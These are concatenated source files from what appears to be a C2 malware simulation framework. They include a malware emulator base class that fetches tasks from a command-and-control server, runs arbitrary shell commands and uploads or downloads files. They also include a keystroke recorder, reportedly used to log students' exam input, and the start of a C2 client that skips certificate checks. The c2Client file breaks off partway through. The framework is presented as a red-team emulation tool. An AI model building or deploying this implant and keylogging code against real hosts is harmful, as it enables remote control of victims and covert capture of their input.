self.clickTemplatePath = templatePath else: print("Error, the click template image file is not exist") #----------------------------------------------------------------------------- def findAndClick(self, recordRst=False): """ Find the template image center position in the source image and click the position. """ # screen short current desktop screenshot = pyscreenshot.grab() filename = 'screenshot_' + datetime.now().strftime('%Y%m%d_%H%M%S') + '.png' if recordRst else DEF_SS_NAME filePath = os.path.join(self.dataDir, filename) screenshot.save(filePath) if self.clickTemplatePath: pos_XY = self.findTemplatePos(filePath, self.clickTemplatePath, recordRst=recordRst) if pos_XY[0] >=0 and pos_XY[1] >=0: print("Find matched click position: %s" % str(pos_XY)) mouse.move(pos_XY[0], pos_XY[1]) time.sleep(0.2) mouse.click() else: print("Warning: didn't find match click position") else: print("Warning: didn't set click template image") #----------------------------------------------------------------------------- #----------------------------------------------------------------------------- def testCase(mode): templateFile = os.path.join(dirpath, 'template.png') clicker = screenPosClicker() recorder = mouseRecorder() recorder.start() clicker.setClickTemplate(templateFile) if mode == 0: print("Test case 0: test click without recording detection result") clicker.findAndClick(recordRst=False) elif mode == 1: print("Test case 1: test click with recording detection result in data folder.") clicker.findAndClick(recordRst=True) elif mode == 2: print("Test case 2: test record and play back mouse trace for 10 sec") recorder.startNewRecord() for i in range(10): time.sleep(1) print("record end in %s sec." % str(10-i)) recorder.stopRecord() recorder.startPlayback() for i in range(12): time.sleep(1) print("playback end in %s sec." % str(12-i)) recorder.stop() else: print("Error: unknown test case: %s" %str(mode)) pass recorder.stop() #----------------------------------------------------------------------------- if __name__ == '__main__': print("Input the test mode:") print("0: test click without recording detection result") print("1: test click with recording detection result in data folder.") print("2: test record and play back mouse trace for 10 sec") mode = int(input()) testCase(mode)
9,571
Python
.py
209
37.15311
129
0.526028
LiuYuancheng/Ninja_C2_Malware_Simulation_System
8
2
0
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,480
c2MwUtils.py
LiuYuancheng_Ninja_C2_Malware_Simulation_System/src/lib/c2MwUtils.py
#----------------------------------------------------------------------------- # Name: c2MwUtils.py # # Purpose: This module is a utility function module used for the other # c2 server / client modules to store the malicious action emulation # program's data, it also provides a command execution class and one # malicious action emulator example class for user to build their # own malware which can be integrated in the C2 system via inherit # the example class. # # Author: Yuancheng Liu # # Version: v_0.2.3 # Created: 2023/10/10 # Copyright: Copyright (c) 2023 LiuYuancheng # License: MIT License #----------------------------------------------------------------------------- """ Program design: We want to develop a utility module which use can inherit it directly to build their own customized malicious action emulator and easily to be integrated in our C2 system. This module contents 4 sub class: 1. CmdRunner : an assistant to execute the cmd is a sub-thread which parallel with the main program thread and get the cmd execution result. 2. programRcd: A program recording (DB) class used to save all the execution state of a malicious action emulator. 3. mwServerRcd: A record class inherit from the <programRcd> class used by the server side to synchronize the execution state of a malware. 4. c2TestMalware: A test malware program example for user to inherit it to build their customized malicious action emulator to integrated in the C2 system. """ import time import threading import subprocess from queue import Queue from datetime import datetime # Add the c2 Client import c2Client # Import all the task state flag from c2Constants import TASK_P_FLG, TASK_F_FLG, TASK_A_FLG, TASK_E_FLG, TASK_R_FLG # Define all the action flag here: from c2Constants import TSK_TYEP_RIG, TSK_TYPE_UPLOAD, TSK_TYPE_DOWNLOAD, TSK_TYPE_CMD # Define maximum command queue size MAX_CMD_QUEUE_SIZE = 100 #----------------------------------------------------------------------------- #----------------------------------------------------------------------------- class CmdRunner(threading.Thread): """ Command runner module to run a command immediately or store in the cmd queue the run parallel with the parent thread. """ def __init__(self, maxQsz=MAX_CMD_QUEUE_SIZE, rstDetailFlg=False): """ init example: cmdrunner = Command(maxQsz=10, rstDetailFlg=True) Args: maxQsz (int, optional): max number of cmd can be enqueued. Defaults to MAX_CMD_QUEUE_SIZE. rstDetailFlg (bool, optional): flag to identify whether to show the cmd execution detailed result. Defaults to False. """ threading.Thread.__init__(self) self.cmdQueue = Queue(int(maxQsz)) self.detailFlg = rstDetailFlg self.terminate = False #----------------------------------------------------------------------------- def run(self): print("Command Runner parallel cmd execution loop started.") while not self.terminate: if not self.cmdQueue.empty(): cmdStr = self.cmdQueue.get() print("Parallel run cmdStr: %s" % str(cmdStr)) self.runCmd(cmdStr, detailFlg=self.detailFlg) time.sleep(0.01) print("Command Runner execution loop end.") #----------------------------------------------------------------------------- def runCmdParallel(self, cmdStr): """ Add a command in the paralled execution queue.""" if not cmdStr: print("The cmd string is empty") return False if not self.cmdQueue.full(): self.cmdQueue.put(str(cmdStr)) return True else: print("Cmd queue is full, cannot add cmdStr:", cmdStr) return False #----------------------------------------------------------------------------- def runCmd(self, cmdStr, detailFlg=False): """ Run a command and collect the result on the victim host. Args: cmdStr (str): command string. detailFlg (bool, optional): flag to identify whether to show/return the execution detail. Defaults to False. Returns: str: return the command execution result, else return execution str 'success'/'fail'/'error' """ if cmdStr: try: result = subprocess.check_output(str(cmdStr), stderr=subprocess.STDOUT, shell=True) if isinstance(result, bytes): result = result.decode('utf-8') print(result) return result if detailFlg else 'success' except Exception as err: print("Rum cmd error: %s" %str(err)) return str(err) if detailFlg else 'fail' else: return 'error' #----------------------------------------------------------------------------- def stop(self): self.terminate = True #----------------------------------------------------------------------------- #----------------------------------------------------------------------------- class programRcd(object): """ A object class to record the controlled malware's data, YC: Later this module will be replaced by backend data base. """ def __init__(self, uniqid, ipaddr, taskList=None, srvFlag=False) -> None: """ Init example : malwarercd = programRcd('testMalware', '127.0.0.1') Args: uniqid (str): malware unique ID. ipaddr (str): malware ip address. tasksList (list(dict()), optional): malare preset task list. Defaults to None. srvFlag (bool): flag to identify whehter it is a server record. - One task dict() examlpe: { 'taskID': 1, 'taskType': 'upload', 'startT': None, 'repeat': 1, 'exePreT': 0, 'taskData': [os.path.join(dirpath, "update_installer.zip")] 'state': TASK_P_FLG }, """ self.uniqid = uniqid self.ipaddr = ipaddr self.srvFlg = srvFlag self.taskList = taskList if taskList else [] self.taskCountDict = { 'total' :len(self.taskList), 'finish' :0, 'accept' :len(self.taskList), 'pending' :0, 'running' :0, 'error' :0, 'deactive' :0 } # Init the list to store the task result and the last execution result. self.taskRstList = [] self.lastTaskRst = { 'taskID' : 0, 'state' : TASK_F_FLG, 'time' : '', 'taskData' : 'registered' } self._initTasksInfo() #----------------------------------------------------------------------------- def _initTasksInfo(self): """ Create the task summary dict() and add the task state in the tasks list.""" # add the record task state in the task list. for task in self.taskList: if task['state'] == TASK_P_FLG: self.taskCountDict['pending'] += 1 elif task['state'] == TASK_R_FLG: self.taskCountDict['running'] += 1 elif task['state'] == TASK_E_FLG: self.taskCountDict['error'] += 1 elif task['state'] == TASK_A_FLG: self.taskCountDict['accept'] += 1 elif task['state'] == TASK_F_FLG: self.taskCountDict['finish'] += 1 self.taskRstList.append(None) # Append None to the result list #----------------------------------------------------------------------------- def addNewTask(self, taskDict): """ Add a new task in to the task list. Args: taskDict (dict): refer to the task dict() examlpe """ # Check taskDict is a dict type if not isinstance(taskDict, dict): print('Error: addNewTask() > input taskDict is not a dict type.') return False keysList = taskDict.keys() taskInfo = { 'taskID' : len(self.taskList), 'taskType' : taskDict['taskType'] if 'taskType' in keysList else TSK_TYPE_CMD, 'startT' : taskDict['startT'] if 'startT' in keysList else None, 'repeat' : taskDict['repeat'] if 'repeat' in keysList else 1, 'exePreT' : taskDict['exePreT'] if 'exePreT' in keysList else 0, 'taskData' : taskDict['taskData'] if 'taskData' in keysList else None, 'state' : TASK_P_FLG if self.srvFlg else TASK_A_FLG } self.taskList.append(taskInfo) self.taskCountDict['total'] += 1 stateKey = 'pending' if self.srvFlg else 'accept' self.taskCountDict[stateKey] += 1 self.taskRstList.append(None) return True #----------------------------------------------------------------------------- # define all the public-get() function here: def getRcdInfo(self): """ Return a malware tasks record summary info.""" infoDict = {'id': self.uniqid, 'ipAddr': self.ipaddr} infoDict.update(self.taskCountDict) return infoDict def getTaskInfo(self, taskID): """ Return one task's info dict(), None if task ID not exist.""" for task in self.taskList: if task['taskID'] == taskID: return task return None def getTaskList(self, taskState=None): """ Return a list of task dict() based on the task state type. Return all the tasks info if the state is None. """ if taskState is None: return self.taskList resultList = [] for task in self.taskList: if task['state'] == taskState: resultList.append(task) return resultList def getTaskRst(self, taskID=None): """ Return all tasks' result if not input task ID, else return task result.""" if taskID is None: return self.taskRstList if 0 <= int(taskID) <= self.taskCountDict['total']: return self.taskList[int(taskID)] return None def getLastTaskRst(self): return self.lastTaskRst #----------------------------------------------------------------------------- # Define all the public-set() function here: def setTaskState(self, idx, state=TASK_F_FLG): if 0 <= idx <= len(self.taskList): self.taskList[idx]['state'] = state return True return False def setTaskRst(self, idx, rst): if 0 <= idx <= len(self.taskRstList): self.taskRstList[idx] = rst return True return False def updateTaskRcd(self, taskList): """ Update the task record state Args: taskList (list of task dict()): _description_ """ for i, task in enumerate(self.taskList): for taskDict in taskList: if task['taskID'] == taskDict['taskID']: self.taskList[i]['state'] = taskDict['state'] self.taskList[i]['startT'] = taskDict['Time'] self.lastTaskRst.update(taskDict) break #----------------------------------------------------------------------------- #----------------------------------------------------------------------------- class mwServerRcd(programRcd): """ A malware record obj inherit from the <programRcd> class used in the C2 emulation system server side to synchronize the malware's state. """ def __init__(self, idx, uniqid, ipaddr, taskList=None, srvFlag=True) -> None: """_summary_ Args: idx (int): malware index in the C2 App. uniqid (str): malware ID ipaddr (str): malware IP address. taskList (list of dict(), optional): list of task dict, refer to class <programRcd>. Defaults to None. srvFlag (bool, optional): _description_. Defaults to True. """ super().__init__(uniqid, ipaddr, taskList, srvFlag) self.idx = idx self.lastUpdateT = None self.connected = False self._initRegister() self.updateTime() #----------------------------------------------------------------------------- def _initRegister(self): """ Init check whether the malware's 1st task is regiter to the c2 Hub.""" for i, task in enumerate(self.taskList): if task['taskType'] == TSK_TYEP_RIG: self.connected = True self.taskList[i]['state'] = TASK_F_FLG return #----------------------------------------------------------------------------- def getRcdInfo(self): """ Return the malware's connection and task record information as dict().""" rcdDict = { 'idx': self.idx, 'connected': self.connected, 'updateT': self.lastUpdateT.strftime('%Y-%m-%d %H:%M:%S') } rcdDict.update(super().getRcdInfo()) return rcdDict def updateTime(self): self.lastUpdateT = datetime.now() def updateRegisterT(self): if len(self.taskList) > 0: self.taskList[0]['startT'] = datetime.now().strftime('%Y-%m-%d %H:%M:%S') #----------------------------------------------------------------------------- #----------------------------------------------------------------------------- class c2TestMalware(object): """ A test malware program example for user to inherit it to build their customized malicious action emulator to integrated in the C2 system. """ def __init__(self, malwareID, ownIp, c2Ipaddr, \ c2port=5000, reportInt=10, downloadDir=None, tasksList=None, c2HttpsFlg=False, cmdTDFlg=False) -> None: """ Init example: client = c2TestMalware(malwareID, ownIP, c2Ipaddr, c2port=c2Port, reportInt=c2RptInv, tasksList=taskList, c2HttpsFlg=c2HttpsFlg) Args: malwareID (str): malware id ownIp (str): malware ip address c2Ipaddr (str): c2 server IP address reportInt (int, optional): time interval between 2 report to c2. Defaults to 10 sec. downloadDir(str, optional): file download save directory. tasksList (list of dict, optional): refer to <programRcd> taskList. Defaults to None. c2HttpsFlg (bool, optional): flag to identify whether connect to c2 via https. Defaults to False. cmdTDFlg (bool, optional): flag to identify whether run the command execution task in the command runner's sub-thread. Defaults to False. """ # Init the malware paramters. self.malwareID = malwareID self.ownIp = ownIp self.c2Ipaddr = c2Ipaddr self.c2port = int(c2port) self.c2HttpsFlg = c2HttpsFlg self.cmdTDFlg = cmdTDFlg self.tasksList = tasksList self.downloadDir = downloadDir if tasksList is None: self.tasksList = [ { 'taskID': 0, 'taskType': 'register', 'startT': datetime.now().strftime('%Y-%m-%d %H:%M:%S'), 'repeat': 1, 'exePreT': 0, 'state' : TASK_R_FLG, 'taskData': None }] # Init the C2 connector. self.c2Connector = c2Client.c2Client(self.malwareID, c2Ipaddr, c2Port=self.c2port, ownIP=self.ownIp, downloadDir=downloadDir, reportInt=reportInt, httpsFlg=self.c2HttpsFlg) # Pre process the tasks. self._preporcessTasks() # Init self record obj: self.ownRcd = programRcd(self.malwareID, self.ownIp, taskList=self.tasksList) self.c2Connector.registerToC2(taskList=self.tasksList) self.cmdRunner = CmdRunner(rstDetailFlg=True) self._initActionHandlers() self.terminate = False # Start all sub thread service self._startSubThreads() self.c2Connector.start() if self.cmdTDFlg: self.cmdRunner.start() #----------------------------------------------------------------------------- # Init all the private interface function here: def _initActionHandlers(self): """ Init the action handlers, children calsses can overwrite this function to init the needed handler such Modbus connector. > This function is called in the super().__init__(...) """ return None def _startSubThreads(self): """ Call the start() of the hanlders if they need to start sub-thread, children calsses can overwrite this function start the user defined service. > This function is called in the super().__init__(...) """ return None def _stopSubThreads(self): """ Call the stop() of the hanlders if they need to stop sub-thread, children calsses can overwrite this function stop the user defined service. > This function is called in the super().stop(...) """ return None def _preporcessTasks(self): """ Preprocess the tasks list, children classes can overwrite this function to add task in the mid of the init. > This function is called in the super().__init__(...) """ return None def _handleSpecialTask(self, taskDict): """ Passed in the task info dict into this function, children classes can overwrite this function adding the handling code. Args: taskDict (_type_): _description_ """ return None #----------------------------------------------------------------------------- def run(self): """ Main tasks handling loop.""" while not self.terminate: # Check whether got new incomming task task = self.c2Connector.getOneC2Task() # sychronized the task record if task is not None: self.ownRcd.addNewTask(task) # do one task for taskDict in self.ownRcd.getTaskList(taskState=TASK_A_FLG): idx = taskDict['taskID'] resultStr = 'taskfinished' for _ in range(taskDict['repeat']): if taskDict['taskType'] == TSK_TYPE_UPLOAD or taskDict['taskType'] == TSK_TYPE_DOWNLOAD: time.sleep(int(taskDict['exePreT'])) uploadFlg = taskDict['taskType'] == TSK_TYPE_UPLOAD self.c2Connector.transferFiles(taskDict['taskData'], uploadFlg=uploadFlg) resultStr = 'File transfered' elif taskDict['taskType'] == TSK_TYPE_CMD: cmd = str(taskDict['taskData'][0]) print("Run cmd : %s " %str(cmd)) resultStr = self.cmdRunner.runCmd(cmd, detailFlg=True) else: resultStr = self._handleSpecialTask(taskDict) self.ownRcd.setTaskState(idx, state=TASK_F_FLG) reportDict ={ 'taskID': idx, 'state': c2Client.TASK_F_FLG, 'Time': datetime.now().strftime('%Y-%m-%d %H:%M:%S'), 'taskData': str(resultStr) } self.c2Connector.addNewReport(reportDict) self.ownRcd.setTaskState(idx, state=TASK_F_FLG) time.sleep(0.1) #----------------------------------------------------------------------------- def stop(self): self.c2Connector.stop() self.cmdRunner.stop() self.terminate = True self._stopSubThreads()
20,439
Python
.py
428
36.535047
120
0.526292
LiuYuancheng/Ninja_C2_Malware_Simulation_System
8
2
0
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,481
ConfigLoader.py
LiuYuancheng_Ninja_C2_Malware_Simulation_System/src/lib/ConfigLoader.py
#!/usr/bin/python #----------------------------------------------------------------------------- # Name: ConfigLoader.py # # Purpose: This module will provide API to load the not stand text format # config file's data. The user can call different get__ method to # fetch the related and call append__ method to new data line into # the config file. # # Author: Yuancheng Liu # # Created: 2019/11/12 # Version: v_0.1 # Copyright: Copyright (c) 2019 LiuYuancheng # License: MIT License #----------------------------------------------------------------------------- """ Program Design: Some times we want to read some program's simple customized config files which are created not under stand format (Json, Yaml). This module is deisgned to solve this problem. Running Platform: Win, Linux, Mac Development Env: Python 3.7.10 Additional Lib: N.A Function: 1. Load the file in list and filtered the comments line based on the user's setting. 2. Users can customized the comments line identify char for the lines they want to igore. 3. Append the new data line into the config file with time stamps. """ import os import datetime FILTER_CHAR = ('#', '', '\n', '\r', '\t') # comment lines 1st identify charactors. ENCODE = 'utf-8' # file encode format. #----------------------------------------------------------------------------- #----------------------------------------------------------------------------- class ConfigLoader(object): def __init__(self, filePath, mode='r', filterChars=None, logFlg=True): """ Init the config loader. example: cfg = ConfigLoader('cfg.txt', mode='r', filterChars=('#', '\n'), logFlg=False) Args: filePath ([str]): Configfile path. mode (str, optional): 'r'-read, 'w'-write ,'rw'-read&write, 'a'-append. Defaults to 'r'. filterChars ([str], optional): Comment lines 1st identify charators list. logFlg (bool, optional): Flag to show the running log. Defaults to True. """ self.filePath = filePath self.mode = mode self.logFlg = logFlg self.filterCharList = filterChars if not filterChars is None and len(filterChars) > 0 else FILTER_CHAR if self.mode == 'r' and not os.path.exists(filePath): if self.logFlg: print('> Error: can not find the config file %s' % str(filePath)) return self.configLines = [] if 'r' in self.mode: try: with open(filePath) as fp: for line in fp.readlines(): if line[0] in self.filterCharList: continue line = line.strip() self.configLines.append(line) if self.logFlg: print('> Init(): load %s lines of config' %str(len(self.configLines))) except: if self.logFlg: print('> Error: can not find the config file %s' % str(filePath)) return #----------------------------------------------------------------------------- def getLines(self, filterFun=None): """ Get all the filered lines of the config file. Args: filterFun ([function], optional): function for filter. Defaults to None. Returns: list[str]: configfile lines data after filtered. """ if not filterFun: return self.configLines return list(filter(filterFun, self.configLines)) #----------------------------------------------------------------------------- def getJson(self, specChar=':'): """ Get the config data under json format (python dict). Args: specChar (str, optional): The key/value pair split char: key<specChar>value. Defaults to ':'. Returns: dict: data json dict. """ result = {} for line in self.configLines: if specChar in line: key, val = line.split(':', 1) if val.lower() == 'true': val = True elif val.lower() == 'false': val = False result[key] = val return result #----------------------------------------------------------------------------- def setMode(self, mode): """ Set the file process mode. Args: mode ([str]): mode string. """ self.mode = mode #----------------------------------------------------------------------------- def appendLine(self, line, timeFlg=False, cmtChar=None): """ Append a new line in the config file. Args: line ([str]): line data. timeFlg (bool, optional): Add the time stamp before the line. Defaults to False. cmtChar ([str], optional):Set char if you want to append the line as comments line. Defaults to None. Returns: [bool]: Whether the line is append successfully. """ if self.mode == 'r': if self.logFlg: print('> Cannot Append line, config loader under read only mode.') return False try: with open(self.filePath, 'a', encoding=ENCODE) as fh: if cmtChar: line = cmtChar + str(line) if timeFlg: line += str(datetime.datetime.now()) fh.write(line+"\n") return True except: if self.logFlg: print('> Error: appendline() can not open file.') return False #----------------------------------------------------------------------------- #----------------------------------------------------------------------------- def testCaseFilter(line): if 'IPADD' in line: return True return False def testCase(mode=0): print("ConfigLoader TestCase() program start:") tCount, tPass = 0, True if mode == 0: dirpath = os.path.dirname(__file__) cfgfilePath = os.path.join(dirpath, 'cfgLoaderR.txt') # test case 0 print("0. Init the config loader :\n----") cfgLoader = ConfigLoader( cfgfilePath, mode='r', filterChars=('#', '', '\n')) tPass = len(cfgLoader.getLines()) == 7 if tPass: tCount += 1 print("Test passed: %s \n----\n" % str(tPass)) # test case 1 print("1. Get specific line with filter test:\n----") datalist = cfgLoader.getLines(filterFun=testCaseFilter) tPass = datalist[0] == 'IPADD:127.0.0.1' tPass = tPass and len(datalist) == 1 if tPass: tCount += 1 print("Test passed: %s \n----\n" % str(tPass)) # test case 2 print("2. Get json data :\n----") jsonDict = cfgLoader.getJson() tPass = jsonDict['IPADD'] == '127.0.0.1' tPass = tPass and jsonDict['FRATE'] == '20' tPass = tPass and jsonDict['DISMD'] == '0' tPass = tPass and jsonDict['SENLV'] == '60' tPass = tPass and jsonDict['TGMIN'] == '400' tPass = tPass and jsonDict['TGMAX'] == '10000' tPass = tPass and jsonDict['SILAT'] == '500' if tPass: tCount += 1 print("Test passed: %s \n----\n" % str(tPass)) # test case 3 print("3. Append data test:\n----") cfgfilePathW = os.path.join(dirpath, 'cfgLoaderW.txt') cfgLoaderW = ConfigLoader(cfgfilePathW, mode='r') cfgLoaderW.setMode('a') cfgLoaderW.appendLine('', timeFlg=True, cmtChar='#') cfgLoaderW.appendLine( '1st line we want to append in cfg with time stamp', timeFlg=True) cfgLoaderW.appendLine( '2st line we want to append in cfg without time stamp', timeFlg=False) tPass = os.path.exists(cfgfilePathW) if tPass: tCount += 1 print("Test passed: %s \n----\n" % str(tPass)) print(" => All test finished: %s/4" % str(tCount)) #----------------------------------------------------------------------------- if __name__ == '__main__': testCase()
8,161
Python
.py
180
36.116667
110
0.512315
LiuYuancheng/Ninja_C2_Malware_Simulation_System
8
2
0
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,482
keyEventActors.py
LiuYuancheng_Ninja_C2_Malware_Simulation_System/src/lib/keyEventActors.py
#!/usr/bin/python #----------------------------------------------------------------------------- # Name: keyEventActor.py # # Purpose: This module will prvoide the computer keyboard actions handling # function such as key record, play back, simulate user type in. # Author: Yuancheng Liu # # Version: v_0.1.2 # Created: 2023/01/02 # Copyright: Copyright (c) 2023 LiuYuancheng # License: MIT License #----------------------------------------------------------------------------- """ Program design: We want to design one keyboard event actor program which can be used by our Kypo tool to test user simulation login and record all the user's keybopard input during the CS2107 mid-term exam in each lab machine. """ import time import json import threading import keyboard # keyboard event for windows.(Linux need sudo permission to execute this) from pynput.keyboard import Key, Controller # keyboard event for Linux (no need sudo permit) #----------------------------------------------------------------------------- #----------------------------------------------------------------------------- class keyEventActor(threading.Thread): """ Actor used to emulator user's key input. Args: winOS (bool): Windows OS Flag. """ def __init__(self, winOS=True) -> None: threading.Thread.__init__(self) self.linuxKeyHd = None if winOS else Controller() self.recordFlg = False self.recordTime = 0 self.keyEventList = None self.ternamted = False #----------------------------------------------------------------------------- def _linuxKeyMatch(self, char): """ convert key string to the pynput's key event parameter.""" charL = str(char) if charL.lower() == 'tab': return Key.tab elif charL.lower() == 'shift': return Key.shift elif charL.lower() == 'enter': return Key.enter return char def clearRecord(self): """ Clear the current record.""" self.keyEventList = None #----------------------------------------------------------------------------- def run(self): print("Keyboard event actor thread started.") while not self.ternamted: if self.recordFlg: #print("record flg: %s" %str(self.recordFlg)) print("Start record user's keyboard event: %s" %str(self.recordTime)) if self.recordTime > 0: time.sleep(self.recordTime) self.stopLogKeyInput() else: while self.recordFlg: time.sleep(1) print("Key record procedure finished.") time.sleep(0.1) #----------------------------------------------------------------------------- def playbackKeyEventList(self, keyEventList=None): if keyEventList is None: keyEventList = self.keyEventList k_thread = threading.Thread(target = lambda :keyboard.play(keyEventList)) k_thread.start() #----------------------------------------------------------------------------- # Define all the get() functions here: def getKeyEventList(self): return self.keyEventList def getKeyEventList(self): return self.keyEventList def getLinuxKeyHd(self): return self.linuxKeyHd def getLastKeyEventRcd(self): return self.keyEventList def getKeyEventRcdStr(self): if self.keyEventList is None: return '' inputStr = '' for event in self.keyEventList: dataJson = json.loads(event.to_json()) if dataJson['event_type'] == 'down': char = '\n' if dataJson['name'] == 'enter' else dataJson['name'] inputStr+=char return inputStr #----------------------------------------------------------------------------- def pressAndrelease(self, keySet, interval=0.1): """ Simulate user press key and release the key Args: keySet (str): _description_ interval (float, optional): time interval (sec) between 2 key press. Defaults to 0.1 sec. """ if self.linuxKeyHd: if not (isinstance(keySet, list) or isinstance(keySet, tuple)): keySet = [keySet] for keyChar in keySet: self.linuxKeyHd.press(self._linuxKeyMatch(keyChar)) if interval > 0.1 : time.sleep(interval) for keyChar in keySet: self.linuxKeyHd.release(self._linuxKeyMatch(keyChar)) else: if isinstance(keySet, list) or isinstance(keySet, tuple): keySet = '+'.join(keySet) keyboard.press_and_release(keySet) #----------------------------------------------------------------------------- def repeatPress(self, keySet, repeat=1, Interval=0.2): for _ in range(repeat): self.pressAndrelease(keySet) time.sleep(Interval) #----------------------------------------------------------------------------- def startLogKeyInput(self, recordTime=0): if self.recordFlg: print('The key report is in progress..') return False self.recordTime = int(recordTime) self.recordFlg = True keyboard.start_recording() return True #----------------------------------------------------------------------------- def stopLogKeyInput(self): if self.recordFlg: self.keyEventList = keyboard.stop_recording() print(">>> %s" %str(self.getKeyEventRcdStr())) self.recordFlg = False self.recordTime = 0 #----------------------------------------------------------------------------- def simuUserType(self, typeinStr, interval=0.2): """ Simulate user type in a string. (under development)""" for char in typeinStr: # Handle the special char create via shift+key if char == '\n' : self.pressAndrelease('enter') elif char == ' ': self.pressAndrelease('space') elif char == '~': self.pressAndrelease(('shift', '`')) elif char == '!': self.pressAndrelease(('shift', '1')) elif char == '@': self.pressAndrelease(('shift', '2')) elif char == '#': self.pressAndrelease(('shift', '3')) elif char == '$': self.pressAndrelease(('shift', '4')) elif char == '%': self.pressAndrelease(('shift', '5')) elif char == '^': self.pressAndrelease(('shift', '6')) elif char == '&': self.pressAndrelease(('shift', '7')) elif char == '*': self.pressAndrelease(('shift', '8')) elif char == '(': self.pressAndrelease(('shift', '9')) elif char == ')': self.pressAndrelease(('shift', '0')) elif char == '_': self.pressAndrelease(('shift', '-')) elif char == '+': self.pressAndrelease(('shift', '=')) else: self.pressAndrelease(char) time.sleep(interval) #----------------------------------------------------------------------------- def typeStr(self, inputStr): """ Simulate input string. Args: inputStr (_type_): _description_ """ if self.linuxKeyHd: self.linuxKeyHd.type(inputStr) else: keyboard.write(inputStr) #----------------------------------------------------------------------------- def stop(self): self.recordFlg = False self.ternamted = True #----------------------------------------------------------------------------- #----------------------------------------------------------------------------- def testCase(mode): keyActor = keyEventActor() keyActor.start() time.sleep(1) if mode == 0: print("TestCase 1: simulate user typein ") testStr = "hello world!\n" keyActor.typeStr(testStr) keyActor.simuUserType(testStr) elif mode == 1: print("TestCase 2: record user input and print.") keyActor.startLogKeyInput() print("Please type in a string:") inputStr = str(input()) keyActor.stopLogKeyInput() print("Input Str: %s" % inputStr) print("KeyEventActor record: %s" %keyActor.getKeyEventRcdStr()) print('\nKeyPress detail: ') keyevents = keyActor.getKeyEventList() for event in keyevents: print(event.to_json()) elif mode == 2: print("TestCase 3: play back input") keyActor.startLogKeyInput() print("Please type in a string:") inputStr1 = str(input()) keyActor.stopLogKeyInput() time.sleep(1) keyevents = keyActor.getKeyEventList() keyActor.playbackKeyEventList(keyevents) print("start to play back input:") inputStr2 = str(input()) print("Keyboard input 1: %s" %inputStr1) print("Repaly input 2: %s" %inputStr2) elif mode == 3: keyActor.startLogKeyInput(recordTime=10) time.sleep(20) keyStr = keyActor.getKeyEventRcdStr() print("input:%s" %str(keyStr)) keyActor.stop() if __name__ == '__main__': testCase(2)
9,547
Python
.py
225
32.928889
93
0.493872
LiuYuancheng/Ninja_C2_Malware_Simulation_System
8
2
0
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,483
c2Client.py
LiuYuancheng_Ninja_C2_Malware_Simulation_System/src/lib/c2Client.py
#!/usr/bin/python #----------------------------------------------------------------------------- # Name: c2Client.py [python3] # # Purpose: This module is the comm client running parallel with the malware # or the the malicious action emulation program's main thread to # communicate with the command and control (C2) hub. It can also be # used by red team's program to call the C2 API to assign task to # specific malware, upload / download file from C2 hub. # # Author: Yuancheng Liu # # Created: 2023/09/02 # version: v0.2.2 # Copyright: Copyright (c) 2023 LiuYuancheng # License: MIT License #----------------------------------------------------------------------------- """ Design purpose: The C2 client is part of the C2-Emulator system which is hooked in the malicious action emulation program / malware to : 1. Report the program action state (result) to the C2 server. 2. Fetch the assigned tasks detailed information from the C2 server. 3. Handle the file translate between C2. - 3.1 upload / download file from C2. - 3.2 accept file sent from C2 and submit the required file to C2. It can also used by the red team's program to connect to C2 to control the registered malicious action emulation program. The Comm topology will be: red_team_program(C2client)<---> C2Hub(C2API) <--->(C2client)Malware """ import os import time import requests import threading from queue import Queue # Define the constents: DFT_RPT_INV = 10 # defualt report C2 server time interval(sec) MAX_C2_TASK = 10 # max number of tasks(accept from C2) can be enqueued in malware MAX_C2_REPORT = 20 # max number of state(report to C2) can be enqueued in malware # Import all the task state flag from c2Constants import TASK_P_FLG, TASK_F_FLG, TASK_A_FLG, TASK_E_FLG, TASK_R_FLG # Import the action constents from c2Constants import ACT_KEY, ACT_GET_TASK, ACT_ACCEPT_FLG, ACT_REJECT_FLG # Import the task type from c2Constants import TSK_TYEP_RIG, TSK_TYPE_RPT, TSK_TYPE_UPLOAD, TSK_TYPE_DOWNLOAD, TSK_TYPE_CMD # Default download file save dir same as the c2client program. dirpath = os.path.dirname(os.path.abspath(__file__)) #----------------------------------------------------------------------------- #----------------------------------------------------------------------------- class c2Client(threading.Thread): """ The C2 client will start a parallel thread with the hooked program's main thread to handle the communication to the command and control hub, the communication is using normal http/https (GET/POST) request.( for the https comm, the program will not verify the cert's validition.) """ def __init__(self, malwareID, c2Ipaddr, c2Port=5000, ownIP='127.0.0.1', downloadDir=None, reportInt=DFT_RPT_INV, httpsFlg=False) -> None: """ Init example : c2Connector = c2Client.c2Client(<unique ID>, <C2 IP>, ownIP=<self IP>) c2Connector.registerToC2() # need to register malware to C2 before call other API functions. self.c2Connector.start() Args: malwareID (str): malware <unique ID>. c2Ipaddr (str): C2 server's public IP address. c2Port (int, optional): web http port. Defaults to 5000. ownIP (str, optional): own IP (victim). Defaults to '127.0.0.1'. downloadDir (str): download file storage folder path. Defaults to same folder as <C2Client.py>. reportInt (int): Time interval between 2 report action to C2. httpsFlg (bool): flag to identify whether use https connection. """ threading.Thread.__init__(self) self.id = str(malwareID) self.ipaddr = ownIP self.freeFlg = True # flag to identify whether the malware is doing a task. # Init all C2 related parameters self.c2Ipaddr = c2Ipaddr self.c2Port = c2Port self.httpsFlg = httpsFlg self.c2taskQueue = Queue(maxsize=MAX_C2_TASK) # Queue to store tasks assigned by the C2. #Task json example : #c2TaskTemplate = { # 'taskID' : 0, # 'taskType' : None, # 'startT' : None, # None means start immediatly if recevied # 'repeat' : 1, # how many times to repeat the task. # 'ExPreT' : 0, # time to wait before execution # 'taskData' : None #} self.c2rptQueue = Queue(maxsize=MAX_C2_REPORT) # Queue to store data/message need to report to C2 #Report json exmaple: #c2reportTemplate = { # 'taskID' : 0, # 'state' : TASK_P_FLG, # 'time' : None, # 'taskData' : None #} self.c2urlDict = self._getUrlDict() # Init all the C2 comm url self.c2ReportInterval = reportInt self.c2Connected = False # Report mutual exclusion check, this function will make sure the client # do task one by one, for example if the client is uploading a file to the C2 # now if the user call the downloadfile() to download a file, the download # task will wait until upload finished. Even our C2 is Mulit-threading, we want # to reduce the load of C2 during tranfer files. self.reportLock = threading.Lock() # report progress mutual exclusion lock flag # function to process the file such as encryption or decryption. 